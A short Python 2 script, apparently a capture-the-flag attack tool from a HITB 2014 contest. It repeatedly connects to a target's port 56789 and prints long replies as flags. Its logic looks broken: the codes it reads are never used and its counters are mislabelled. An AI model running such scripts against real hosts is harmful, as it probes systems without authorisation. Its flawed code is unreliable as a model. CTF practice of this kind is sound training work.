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Created October 26, 2014 11:51
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Daemon 4 attacker HITB2014
import socket
import sys
def recv_until(st):
ret = ""
while st not in ret:
ret += s.recv(8192)
return ret
a = open("timemap.txt", "r")
lines = a.readlines()
codes = []
for l in lines:
a, b = l.strip().split(" ")
codes += [b]
target = sys.argv[1]
print "target ", target
ctr = 0
errctr = 0
for i in codes:
s = socket.create_connection((target, 56789))
f = s.recv(8192)
ctr += 1
if ((ctr % 10)==0):
print ctr
if (len(f)>10):
print "Flag ", f
errctr += 1
print "Error ", errctr
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